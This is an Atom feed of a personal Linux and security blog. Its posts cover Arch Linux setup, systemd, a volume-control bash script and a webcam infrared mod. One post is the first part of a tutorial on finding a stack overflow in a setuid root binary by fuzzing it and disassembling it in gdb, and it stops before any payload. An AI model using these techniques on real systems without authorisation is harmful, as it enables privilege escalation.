tag:blogger.com,1999:blog-865760686327699992024-03-13T22:17:27.224-07:00mmap() to nullthoughts on open source, security or anything interesting...sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.comBlogger53125tag:blogger.com,1999:blog-86576068632769999.post-87930675102146817292016-03-14T09:20:00.003-07:002016-03-14T09:20:40.608-07:00Its 2016!<div dir="ltr" style="text-align: left;" trbidi="on">
Its been more than 2 years since my last post. Life has been colorful meanwhile, and I plan on making a return. This post is just a heartbeat to let people know that I am still alive.</div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-9504001824592225102013-10-15T13:14:00.001-07:002013-12-29T09:38:49.866-08:00Counterstrike Server lookup in python<div dir="ltr" style="text-align: left;" trbidi="on">
Wrote this script in leisure time long time ago to look up counterstrike servers in my college network. Designed for CZERO, modificiation required for version 1.6, enjoy and edit as per need.
<iframe src="http://pastebin.com/embed_iframe.php?i=cM9S11V8" style="border:none;width:100%;height:500px"></iframe>
<br />
<i><br />
</i> <i><xxx .xxx.xxx=""><port 27015="" efault=""><version><quiet><parse><xxx .xxx.xxx=""><xxx .xxx.xxx=""><xxx .xxx.xxx=""></xxx></xxx></xxx></parse></quiet></version></port></xxx></i></div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-17381786210602725492013-04-16T10:28:00.004-07:002013-04-16T10:31:50.106-07:00Travels from the prison of $ to the realm of # [PART 1]<div dir="ltr" style="text-align: left;" trbidi="on">
<b><span style="font-size: small;">Beginning Notes: </span></b><br />
<b>1. A modest amount of core knowledge is assumed.</b><br />
<b>2. A read of "Smashing The Stack for Fun and Profit" by Aleph One would be recommeded.</b><br />
<b>3. Point '2' doesn't guarante anything and for further queries refer to point '1' or ask away under comments.</b><br />
<br />
To get the <b>#</b> symbol at a console is a local exploit's dream. But in the current privelaged land of <b>root</b>, it is not uncommon to face challanges. Lets take a simple example: <b>a setuid root binary</b>, data read from a file and echoed onto the stdout. Lets make this a little easier: the binary is <b>not stripped</b>. Lets make this a little more easier: <b>ASLR & Stack Cookies</b> are <b>disabled</b>... <b>for now</b>. At the same time, it's a 64 bit system, NX is enabled [Hardware Enforced] & we don't have the code.<br />
<br />
Enough talking, lets get our hands dirty...<br />
<br />
A sample run:<br />
<br />
<span style="font-size: x-small;">$> ./test<br />usage: ./test file_name<br />$> echo "hello" > foo<br />$> ./test foo<br />Data Read: hello</span><br />
<br />
looks good, the program takes a filename as input, reads the file and echos the file contents on stdout.<br />
<br />
lets try to spice it up a bit, run the program with input incremented by 100 characters each time:<br />
for the character stream generation, we shall use good ol' python.<br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*100" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]<br /> <br />$> python -c "print 'A'*200" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<span style="font-size: x-small;"><br />$> python -c "print 'A'*300" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<br />
Seems good till now, maybe the code isn't vulnerable, but that wouldn't be fun would it ;)<br />
lets keep trying...<br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*400" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]</span><br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*500" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... [OUTPUT TRUNCATED]</span><br />
Maybe this is a lost cause, we might as well go and check our email...<br />
"<i>Patience my padawan learner</i>" <br />
<br />
<span style="font-size: x-small;">$> python -c "print 'A'*600" > foo && ./test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... </span><br />
<span style="font-size: x-small;">Segmentation Fault (core dumped)</span><br />
<br />
bullseye! segfault, the buffer doesn't seem to be unlimited afterall.<br />
Looking at all the attempts, we can easily say that the buffer lies between 500 to 600 bytes.<br />
<br />
Lets fireup GDB for a bit of code and stack analysis.<br />
<span style="font-size: x-small;"><br />$> gdb test<br />GNU gdb (GDB) 7.2<br />Copyright (C) 2010 Free Software Foundation, Inc.<br />License GPLv3+: GNU GPL version 3 or later <http: gnu.org="" gpl.html="" licenses=""><br />This is free software: you are free to change and redistribute it.<br />There is NO WARRANTY, to the extent permitted by law. Type "show copying"<br />and "show warranty" for details.<br />This GDB was configured as "x86_64-unknown-linux-gnu".<br />For bug reporting instructions, please see:<br /><http: bugs="" gdb="" software="" www.gnu.org="">...<br />Reading symbols from /home/sandman/test...(no debugging symbols found)...done.<br />(gdb) run foo<br />Starting program: /home/sandman/test foo<br />Data Read: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00000000004007af in echo_me ()</http:></http:></span><br />
Seems like the code segfaults in the function echo_me(), a little bit of disassembly required (thankfully the binary is not stripped)...<br />
<br />
<span style="font-size: x-small;">(gdb) disas echo_me<br />Dump of assembler code for function echo_me:<br /> 0x00000000004006d4 <+0>: push %rbp<br /> 0x00000000004006d5 <+1>: mov %rsp,%rbp<br /> 0x00000000004006d8 <+4>: sub $0x240,%rsp<br /> 0x00000000004006df <+11>: mov %rdi,-0x238(%rbp)<br /> 0x00000000004006e6 <+18>: mov $0x4008ec,%edx<br /> 0x00000000004006eb <+23>: mov -0x238(%rbp),%rax<br /> 0x00000000004006f2 <+30>: mov %rdx,%rsi<br /> 0x00000000004006f5 <+33>: mov %rax,%rdi<br /> 0x00000000004006f8 <+36>: callq 0x4005b0 <fopen plt=""><br /> 0x00000000004006fd <+41>: mov %rax,0x20053c(%rip) # 0x600c40 <fp><br /> 0x0000000000400704 <+48>: mov 0x200535(%rip),%rax # 0x600c40 <fp><br /> 0x000000000040070b <+55>: test %rax,%rax<br /> 0x000000000040070e <+58>: jne 0x400724 <echo_me><br /> 0x0000000000400710 <+60>: mov $0x4008ee,%edi<br /> 0x0000000000400715 <+65>: callq 0x400580 <puts plt=""><br /> 0x000000000040071a <+70>: mov $0xffffffff,%edi<br /> 0x000000000040071f <+75>: callq 0x4005a0 <exit plt=""><br /> 0x0000000000400724 <+80>: mov 0x200515(%rip),%rax # 0x600c40 <fp><br /> 0x000000000040072b <+87>: mov $0x2,%edx<br /> 0x0000000000400730 <+92>: mov $0x0,%esi<br /> 0x0000000000400735 <+97>: mov %rax,%rdi<br /> 0x0000000000400738 <+100>: callq 0x400590 <fseek plt=""><br /> 0x000000000040073d <+105>: mov 0x2004fc(%rip),%rax # 0x600c40 <fp><br /> 0x0000000000400744 <+112>: mov %rax,%rdi<br /> 0x0000000000400747 <+115>: callq 0x400570 <ftell plt=""><br /> 0x000000000040074c <+120>: mov %eax,-0x4(%rbp)<br /> 0x000000000040074f <+123>: mov 0x2004ea(%rip),%rax # 0x600c40 <fp><br /> 0x0000000000400756 <+130>: mov $0x0,%edx<br /> 0x000000000040075b <+135>: mov $0x0,%esi<br /> 0x0000000000400760 <+140>: mov %rax,%rdi<br /> 0x0000000000400763 <+143>: callq 0x400590 <fseek plt=""><br /> 0x0000000000400768 <+148>: mov 0x2004d1(%rip),%rdx # 0x600c40 <fp><br /> 0x000000000040076f <+155>: mov -0x4(%rbp),%ecx<br /> 0x0000000000400772 <+158>: lea -0x230(%rbp),%rax<br /> 0x0000000000400779 <+165>: mov %ecx,%esi<br /> 0x000000000040077b <+167>: mov %rax,%rdi<br /> 0x000000000040077e <+170>: callq 0x4005d0 <fgets plt=""><br /> 0x0000000000400783 <+175>: mov 0x2004b6(%rip),%rax # 0x600c40 <fp><br /> 0x000000000040078a <+182>: mov %rax,%rdi<br /> 0x000000000040078d <+185>: callq 0x4005e0 <fclose plt=""><br /> 0x0000000000400792 <+190>: mov $0x4008fa,%eax<br /> 0x0000000000400797 <+195>: lea -0x230(%rbp),%rdx<br /> 0x000000000040079e <+202>: mov %rdx,%rsi<br /> 0x00000000004007a1 <+205>: mov %rax,%rdi<br /> 0x00000000004007a4 <+208>: mov $0x0,%eax<br /> 0x00000000004007a9 <+213>: callq 0x400560 <printf plt=""><br /> 0x00000000004007ae <+218>: leaveq <br />=> 0x00000000004007af <+219>: retq <br />End of assembler dump.<br />(gdb)</printf></fclose></fp></fgets></fp></fseek></fp></ftell></fp></fseek></fp></exit></puts></echo_me></fp></fp></fopen></span><br />
<br />
looking at the disassembly, its quite easy to get an idea of the code by a simple follow of the important @plt [procedure linkage table] calls...<br />
<br />
<span style="font-size: x-small;">function echo_me(){<br /> fopen(file) | open the file<br /> fseek(till EOF) --|<br /> ftell(file_des) |--> to calculate the length of the file<br /> fseek(till BOF) --| <br /> fgets(the string from the file) | get the string from the file and store it in the buffer [the vulnerability lies here]<br /> fclose(file) | close the file<br /> printf(the string) | print the string<br />}</span><br />
<br />
looking at all this it is evident what the programmer has done. A buffer with a static size was defined, the file size was calculated and was read into the buffer. Finally, the buffer is displayed as the output.</div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-17073022783612506842013-02-12T03:07:00.001-08:002013-02-12T03:31:06.549-08:00amixer vs alsamixer: Master channel<div dir="ltr" style="text-align: left;" trbidi="on">
A convenient method to change the Master volume that I use is via a custom KISS bash script that essentially calls <b>amixer</b>. One curious observation I made was that the return value of amixer for the Master channel did not correlate with <b>alsamixer</b>. A small research reveals why:<br />
<br />
from the alsa-devel mailing list:<br />
<br />
<span style="font-size: small;"><i>The percentage in amixer has nothing to do with dB level. <br />It's just the percentage of the raw value range of that mixer <br />element. Thus showing 89% is correct. It's 10% down from 100% <br />(1% is because of the resolution of the raw values). </i></span><br />
<span style="font-size: small;"><i><br /></i></span>
<span style="font-size: small;"><i>Now, alsamixer shows the percentage in a different way. It's <br />explained well in the source code (alsamixer/volume_mapping.c), but <br />not mentioned in the man page, unfortunately.</i></span><br />
<span style="font-size: small;"><i>* The mapping is designed so that the position in the interval is proportional <br />* to the volume as a human ear would perceive it (i.e., the position is the <br />* cubic root of the linear sample multiplication factor). For controls with <br />* a small range (24 dB or less), the mapping is linear in the dB values so <br />* that each step has the same size visually. Only for controls without dB <br />* information, a linear mapping of the hardware volume register values is used <br />* (this is the same algorithm as used in the old alsamixer).</i></span><br />
<span style="font-size: small;"><i>The percentage representation in alsamixer corresponds to this <br />mapping, thus it's neither dB nor linear percent.</i></span><br />
<br />
<span style="font-size: x-small;"><span style="font-size: small;">Original discussion is here:</span></span><br />
<span style="font-size: x-small;"><i><a href="http://mailman.alsa-project.org/pipermail/alsa-devel/2012-March/050146.html" rel="nofollow" target="_blank">http://mailman.alsa-project.org/pipermail/alsa-devel/2012-March/050146.html</a></i></span><br />
<br />
<span style="font-size: x-small;"><span style="font-size: small;">The scr<span style="font-size: small;">ipt itself<span style="font-size: small;">:</span></span></span></span><br />
<br />
<b><span style="font-size: x-small;">#!/bin/bash<br />##Amixer Script.<br />if [ $1 -eq 1 ]<br />then<br /> amixer set Master 5%+<br /> notify-send "Volume Increase +5%:" "Master Volume Level: $(amixer get Master | grep Mono: | grep [0-9]*% -o)"<br />fi<br /><br />if [ $1 -eq 2 ]<br />then<br /> amixer set Master 5%-<br /> notify-send "Volume Decrease -5%:" "Master Volume Level: $(amixer get Master | grep Mono: | grep [0-9]*% -o)"<br />fi<br /><br />#if [ $1 -eq 0 ]<br />#then<br /># amixer set Master toggle<br /># notify-send "Volume Master Toggle:" "Master Volume Level: "<br />#fi</span></b><br />
<b><span style="font-size: x-small;">#EOF</span></b><br />
<span style="font-size: x-small;"><i><br /></i></span>
<span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: small;">Run</span><span style="font-size: x-small;"><span style="font-size: small;">ning with arguments 1,2 </span><span style="font-size: x-small;"><span style="font-size: small;">or 0 </span><span style="font-size: x-small;"><span style="font-size: small;">increases</span><span style="font-size: x-small;"><span style="font-size: small;">, d</span><span style="font-size: x-small;"><span style="font-size: small;">ecre</span><span style="font-size: x-small;"><span style="font-size: small;">ases or </span><span style="font-size: x-small;"><span style="font-size: small;">toggles(Mut</span><span style="font-size: x-small;"><span style="font-size: small;">e) the Master channel</span><span style="font-size: x-small;"><span style="font-size: small;"> respectiv<span style="font-size: small;">e</span>ly. I don't use the toggle segment thus its commented out.</span></span></span></span></span></span></span></span></span></span></span></span></div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-22901380205935872842013-02-10T09:58:00.002-08:002013-02-10T10:54:51.689-08:00Linux in 2013, systemd, kernel regressions etc etc...<div dir="ltr" style="text-align: left;" trbidi="on">
It has been a very busy time for me, exams on one side and setting up Arch all over again on the other. Somehow I got upto 70% of the work done reinstalling, configuring, rewritting and theming but thankfully the worst is out of the way. I know that because before I reinstalled Arch, I assumed a lot of things about the procedure from earlier experience but the reality was close to shocking, see below.<br />
<br />
1. Arch installer removed, all steps are to be done by the user.<br />
2. Bye sysvinit! Hello systemd <br />
3. Kernel Power Regressions. !!<br />
4. HDD APM Issue. !! <br />
5. Openbox updated to 3.5<br />
6. Kernel Ver. @ 3.7.6<br />
7. Since I had newer hardware with dual GPUs [Hybrid Graphics/Optimus], I had to rewrite conky and many scripts due to many low level changes.<br />
<br />
Now Im not saying that all of this was bad, actually upgrades like systemd were much of a welcome, anyway what follows is a rundown of each and what I did to counter/resolve the issues.<br />
<br />
1. Not much of an issue actually, to be honest, I liked the fact that the installer now required the user to customize manually. Helps in the optimization of the system also as a secondary bonus, the packages installed are always the latest since the new installer "pacstrap" downloaded the latest package versions as compared to installing directly from the Live Media.<br />
<br />
2. This was a big surprise, whatever I knew about the original rc.conf sysvinit boot system had to be washed and relearnt with systemd in mind. Mind you, systemd is a boon! Bootup times have been slashed due to the efficient parallelization implemented which contrasts from the original init sequential boot proccess. Also systemd allowed for a much neater boot process modification and the entire start|stop sequence is much cleaner. Although it takes a while to get used to but once you do, creating your own service/tmpfiles becomes a breeze. Also syslogd is now replaced with a journel which can be accessed through the systemctl command. Actually all one needs to use is the systemctl command!<br />
<br />
3. These "issues" are actually fixed in the 3.8.x RC versions which are yet to be tested and marked stable but we will get there. The issues Im talking about affect the sandybridge (and possibly ivy too!) line of CPUs. CPU frequency scaling gets locked at maximum frequency w/o turbo boost (Thank god!). In my case (2670QM) the scaling clocks reported to be the lowest clock possible: 800 MHz, but a look at the current clocks proved that they were actually stuck at 2.2 GHZ. Also, on the integrated GPU end, RC6 (powersaving) state was not being initialized. What really frustrated me further that temperatures were 10-15 degrees (Celsius) higher than in Windows. This tends to happen randomly per boot and will be fixed once 3.8 is available as stable. Tip: If you cant wait, check the links at the end of the post for RC(Release Candidate) versions of the kernel.<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><b> #] cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq<br /> 800000<br /><br /> #] cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq<br /> 2201000</b></span><br />
<br />
4. This was the most annoying/frustrating issue I have ever had. Not because it was difficult to fix but because of the everlasting effect it may have had on my HDD. Before I say more, understand that its not really Linux's fault, read on. Long story short, 2.5" HDDs implement shady power saving mechanisms such as head parking and spinning down the spindle motor during an I/O idle session. Furthermore the smart brass at WDC decided to choose power saving over HDD lifespan. How they achieved this was by implementing something called <a href="http://www.instantfundas.com/2011/12/intellipark-makes-western-digital-green.html" target="_blank"><u><b>intellipark</b></u></a>, which essentially parks the head whenever it senses that I/O is idling. Sometimes this is done in less than 8 seconds. What this results in is a constant "<i>clicking</i>" sound from the HDD and the slow but eventual degradation in head quality which could lead to HDD failure. If that is not enough, the slowdown of the spindle motor puts pressure on it because to spin up the motor for an I/O active session it requires throwing in more power and not to mention stresses the motor further (Newton's first law!).<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><b>12 Power_Cycle_Count 0x0032 100 100 000 Old_age Always - 455</b></span><br />
<span style="font-size: x-small;"><b>193 Load_Cycle_Count 0x0032 155 155 000 Old_age Always - 136465</b></span><br />
<br />
Checking SMART data on the HDD showed that the current LOAD_CYCLE_COUNT (Number of parks) had jumped to 136465 in less than a year. To put this in perspective, an average 2.5" HDD has a lifetime of 300000 - 600000 parks. Way to go WDC! <br />
<br />
I would also like to add that a similar but slightly less annoying effect was also visible when running Windows 7. Thankfully Linux has a tool [hdparm] which allows modifying many variables on the HDD directly such as the APM(Advanced Power Management) value. My original value was 96, which then I changed to 254 to basically kill all possible forms of APM. Did it work?<br />
<br />
Yes! :-)<br />
<br />
5. Not new and also not much of an issue, openbox 3.4 config is a drop in replacement for 3.5.<br />
<br />
6. Kernel is currently at 3.7.6, nice and fast with major fixes but with the power regressions.<br />
<br />
7. As previously mentioned in an older post, this was somewhat of a new laptop, modifying old scripts/configs took some time, had to scale conky config and other scripts to take into i7's quad cores plus inclusion of NVIDIA GPU temperature monitoring thanks to the free <b>nouveau</b> driver which enabled basic power management.<br />
<br />
Optimus is still not a fully functional componenet in Linux but thanks to projects such as <b>bumblebee</b>, enabling hybrid graphics support was relatively easy.<br />
<br />
So thats pretty much it, Im looking forward to checking out how tools such as Metasploit, Nmap etc have improved.<br />
<br />
Any questions/comments... insults?? <br />
<br />
Ref:<br />
<br />
<u><b>Kernel Power Regressions: </b></u><br />
: <a href="https://bbs.archlinux.org/viewtopic.php?id=150743">https://bbs.archlinux.org/viewtopic.php?id=150743</a> //RC Versions in this thread<br />
: <a href="https://wiki.archlinux.org/index.php/Intel_Graphics#Module-based_Powersaving_Options" target="_blank">https://wiki.archlinux.org/index.php/Intel_Graphics#Module-based_Powersaving_Options </a><br />
<br />
<u><b>HDD APM Issue: </b></u><br />
: <a href="https://bbs.archlinux.org/viewtopic.php?id=39258">https://bbs.archlinux.org/viewtopic.php?id=39258</a><br />
: <a href="https://wiki.archlinux.org/index.php/Hdparm#Parking_your_hard_drive">https://wiki.archlinux.org/index.php/Hdparm#Parking_your_hard_drive</a><br />
: <a href="http://en.wikipedia.org/wiki/S.M.A.R.T.#ATA_S.M.A.R.T._attributes">http://en.wikipedia.org/wiki/S.M.A.R.T.#ATA_S.M.A.R.T._attributes</a><br />
: <a href="http://forums.anandtech.com/showthread.php?t=2085685">http://forums.anandtech.com/showthread.php?t=2085685</a><br />
<br />
<u><b>Systemd:</b></u><br />
: <a href="https://wiki.archlinux.org/index.php/Systemd" target="_blank">https://wiki.archlinux.org/index.php/Systemd </a></div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-17993542189290525382013-02-03T07:42:00.000-08:002013-02-03T10:34:58.019-08:00There and back again....<div dir="ltr" style="text-align: left;" trbidi="on">
Went from Fedora > Ubuntu > Fedora > Arch > Fedora > Arch(Incomplete setup) > M$ Bulldows. Been so busy lately that haven't used linux in 6 months! Arch is a pain to setup again (don't get me wrong, its a great distro and my fav.) so I guess I will finally go back to where I came from.... Fedora.<br />
<br />
Current release => Fedora 18<br />
<br />
Downloading right now!<br />
<br />
EDIT: Nope... F18 sucks (Check below)... thankfully i did a little research... I guess the universe wants me to stick to Arch, Its better to set things up the way you like them and not letting some company or a group of people decide. <br />
<br />
Src: <a href="http://www.dedoimedo.com/computers/fedora-18-kde.html">http://www.dedoimedo.com/computers/fedora-18-kde.html</a><br />
Src2: <a href="http://linux.slashdot.org/story/13/01/23/230255/alan-cox-fedora-18-the-worst-red-hat-distro-switches-to-ubuntu">http://linux.slashdot.org/story/13/01/23/230255/alan-cox-fedora-18-the-worst-red-hat-distro-switches-to-ubuntu</a></div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-39939601089473537282013-01-31T07:14:00.002-08:002013-01-31T22:25:44.795-08:00Infra-Webcam Mod Part 1.<div dir="ltr" style="text-align: left;" trbidi="on">
Due to a recent break-in near at our apartments, the whole security infrastructure went through an overhaul. Going through all the new features, I came across one that caught my eye, Night-Vision Security Cameras. Upon further investigation, I found these were actually Infrared cameras.<br />
<br />
The cameras themselves looked like webcams dotted with red LEDs. Now, I had seen them before but never wondered their purpose or capability. A simple Google search uncovered a ton of info and the part that totally took me by surprise was the fact that these could be engineered at home using simple everyday camera hardware.<br />
<br />
Now, I'm not gonna write down a tutorial or go much in depth but will give some insight on how I made mine.<br />
<br />
The idea is simple. A normal camera has 3 components, the Lens, The IR filter and the CCD chip. All one has to do is to remove the IR filter and replace it with a "Visible Light filter" (Hint: Kodak).<br />
<br />
Anyway, below are a few pics I took while disassembling and modding.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE5xs8uyBr7QJt2XBpAR2zXHz6RfUbr78tO39V1XkytawQKslS8L_cOUfDGojslgmqpKnBARg7IlkQ4IRwjDd7LkSvwAbHHKSDbEgorhBjwVAm1PAgCDy7goQO7qmgOIWmRooUqiCu49xx/s1600/2013-01-31+18.28.09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE5xs8uyBr7QJt2XBpAR2zXHz6RfUbr78tO39V1XkytawQKslS8L_cOUfDGojslgmqpKnBARg7IlkQ4IRwjDd7LkSvwAbHHKSDbEgorhBjwVAm1PAgCDy7goQO7qmgOIWmRooUqiCu49xx/s200/2013-01-31+18.28.09.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">The Camera (Source: Local flea market, Vendor: PC-Touch)</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtccJQsdHmi80vAvJt8cIIyL0O6VgC0TEcouS1s1IHpUTsr-uTxSnYGk2kBKCJ6eMLlXs80A_sKCx8TPZUstmgDOis_glZAdZ_l8HpcpkND-yxHspo32fTZoM6hqfLoo6M-xzd3s1ahOy-/s1600/2013-01-31+19.31.54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtccJQsdHmi80vAvJt8cIIyL0O6VgC0TEcouS1s1IHpUTsr-uTxSnYGk2kBKCJ6eMLlXs80A_sKCx8TPZUstmgDOis_glZAdZ_l8HpcpkND-yxHspo32fTZoM6hqfLoo6M-xzd3s1ahOy-/s200/2013-01-31+19.31.54.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>The PCB with the Lens, IR FLTR, CCD.</i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha17a4JSv9ATYdRLq_6lHMXHxEMeMlCWQ7JdoiJnJieWI98XusmiWcooDmNxbfP_RxKAZcHVW9crA9BM0kDwGEkfYr9uC1sNHRpU8ommoVIwnzK1f6fzg5AQlgusnoEnXPQcT70lNueQeY/s1600/2013-01-31+19.33.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha17a4JSv9ATYdRLq_6lHMXHxEMeMlCWQ7JdoiJnJieWI98XusmiWcooDmNxbfP_RxKAZcHVW9crA9BM0kDwGEkfYr9uC1sNHRpU8ommoVIwnzK1f6fzg5AQlgusnoEnXPQcT70lNueQeY/s200/2013-01-31+19.33.04.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>IR Filter (Note to self: Next time take the picture before breaking the thing :-P)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEXXDPfHiPeN0a55nQC2YUo7fFONlHH9bSJ1h18xPpnCgvKMPVLl5D7ZS6XQ5hMGDxb5qI_MQPdUdEnB-SCdrSpycmDrkOcmw8uv7Stp1IiI-cMgCyLvIRXz4RTiWEYlo1tYN5g3nowzlL/s1600/2013-01-31+19.34.03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEXXDPfHiPeN0a55nQC2YUo7fFONlHH9bSJ1h18xPpnCgvKMPVLl5D7ZS6XQ5hMGDxb5qI_MQPdUdEnB-SCdrSpycmDrkOcmw8uv7Stp1IiI-cMgCyLvIRXz4RTiWEYlo1tYN5g3nowzlL/s200/2013-01-31+19.34.03.jpg" width="150" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>CCD Chip (Lens, IR FLTR removed)</i></span></div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhFEIiqnO_ryFDOiMfzYIJuVa42iBpzGRdXRrY3Z0aWqAqI5m5Is0IbPTkA69AKRM0JvrfM4ERG9l5LYuUhSnrTXq7KDgEXvjtFPc_8DKZC3GcvMAr6ds3U9n9pzYzXkUnks-5zwjSZxc/s1600/2013-01-31+19.33.12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhFEIiqnO_ryFDOiMfzYIJuVa42iBpzGRdXRrY3Z0aWqAqI5m5Is0IbPTkA69AKRM0JvrfM4ERG9l5LYuUhSnrTXq7KDgEXvjtFPc_8DKZC3GcvMAr6ds3U9n9pzYzXkUnks-5zwjSZxc/s200/2013-01-31+19.33.12.jpg" width="200" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i> Camera Lens with the light filter (Exposed camera film[Even Gradient])</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWtyFBRpbsKeoyJcG4uG8Fetm3hdNmGF8eMfaquUNe91MXgFm7prT4FpoKMHakU2WFblYM0AreM88tvlJqUvli0OsbbGWqSNAG1cuafNS-U1vmJpMDIbDJUKYHfNGShxjkVqcUuV88hRY/s1600/2013-01-31+19.32.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWtyFBRpbsKeoyJcG4uG8Fetm3hdNmGF8eMfaquUNe91MXgFm7prT4FpoKMHakU2WFblYM0AreM88tvlJqUvli0OsbbGWqSNAG1cuafNS-U1vmJpMDIbDJUKYHfNGShxjkVqcUuV88hRY/s200/2013-01-31+19.32.22.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>Reassembled Module</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
Results in the next post.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Update[1/2/2013]: Damn! the drivers are 32 bit. Lets see if Linux does the job.</div>
</div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-83490781584454490612013-01-30T05:36:00.002-08:002013-01-31T22:26:39.423-08:00WOL PACKET RECIEVED!<div dir="ltr" style="text-align: left;" trbidi="on">
Ok i know i keep disappearing... but im back.... had some tasks to complete ;- )</div>
sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-76184619933581637572012-07-11T08:27:00.001-07:002012-07-12T03:21:12.057-07:00Old Cell Phones == treasure;<div dir="ltr" style="text-align: left;" trbidi="on">
I guess many people don't realize before dumping their old phones that they are also throwing away a treasure trove of micro hardware that can be extracted and used in multiple DIY projects. I don't blame them as most people don't even know how does the vibration in their phones work.<br />
<br />
So recently while going through some old 2006< cellphones, I decided to salvage such components. I recovered some really neat gems:<br />
<ul style="text-align: left;">
<li>Micromotors [<i>Both types: External and Sealed</i>]</li>
<li>Mics</li>
<li>Speakers</li>
<li>2MP camera modules</li>
<li>LCDs [<i>Color 64K & 256K 160ppi & B/W 100ppi</i>]</li>
<li>Micro DC-in female jacks</li>
</ul>
Now to think of some things I could do with them!?? Bristlebots anyone ;-) </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-44033926382882299002012-07-07T08:50:00.000-07:002012-07-07T08:50:13.061-07:00EXT4 filesystems on M$ Windows<div dir="ltr" style="text-align: left;" trbidi="on">
A real pain that I had to go through was the inablility to preoperly read EXT4 filesystems on Windows. My old solution was a standalone app called Ext2Read but it was slow and a very dirty solution [<i>files had to be copied onto a NTFS filesystem first</i>]. <br />
<br />
